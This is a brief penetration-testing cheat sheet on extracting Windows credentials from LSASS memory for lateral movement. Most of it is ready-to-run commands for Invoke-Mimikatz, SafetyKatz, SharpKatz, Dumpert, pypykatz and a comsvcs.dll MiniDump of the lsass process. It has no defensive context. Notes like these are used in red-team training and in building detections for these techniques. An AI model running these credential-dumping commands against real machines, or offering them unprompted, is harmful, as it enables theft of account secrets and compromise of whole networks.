Mimikatz

Mimikatz

Mimikatz can be used to dump credentials, tickets, and many more interesting attacks.Invoke-Mimikatz, is a PowerShell port of Mimikatz. Using the code from ReflectivePEInjection, mimikatz is loaded reflectively into the memory. All the functions of mimikatz could be used from this script.The script needs administrative privileges for dumping credentials from local machine. Many attacks need specific privileges which are covered while discussing that attack.

Lateral Movement - Extracting credentials from LSASS

Dump credentials on a local machine

Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

Using SafetyKatz(Minidumpof lsassand PELoaderto run Mimikatz)

SafetyKatz.exe "sekurlsa::ekeys"

Dump credentials Using SharpKatz(C# port of some of Mimikatz functionality)

SharpKatz.exe --Command ekeys

Dump credentials using Dumpert(Direct System Calls and API unhooking)

rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump

Using pypykatz(Mimikatz functionality in Python)

pypykatz.exe live lsa

Using comsvcs.dll

tasklist /FI "IMAGENAME eqlsass.exe" rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <lsassprocess ID> C:\Users\Public\lsass.dmp full

Over Pass The Hash Lateral Movement is in Lateral Movement section.

Last updated